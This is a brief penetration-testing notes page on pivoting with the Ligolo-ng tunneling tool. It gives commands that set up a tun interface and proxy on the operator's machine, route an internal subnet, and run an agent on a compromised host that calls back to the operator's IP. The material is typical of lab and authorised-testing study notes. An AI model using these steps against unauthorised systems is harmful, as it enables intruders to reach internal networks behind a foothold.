Pivoit
Ligolo-ng
my machine
sudo ip tuntap add user root mode tun ligolo
sudo ip link set ligolo up
#unzip the tar file
tar -xvzf ligolo-ng_proxy_0.5.1_linux_amd64.tar.gz
#run
sudo ./proxy -selfcert
#if 11601 is not working (meaning not getting a call back)
sudo ./proxy -selfcert -laddr 0.0.0.0:443
#add route
sudo ip route add 192.168.110.0/24 dev ligolo
#select the session and start the tunnel
Linux/Windows host (Single pivot)
./agent -connect 10.10.16.6:11601 -ignore-cert
./agent -connect 10.10.16.6:443 -ignore-cert
Last updated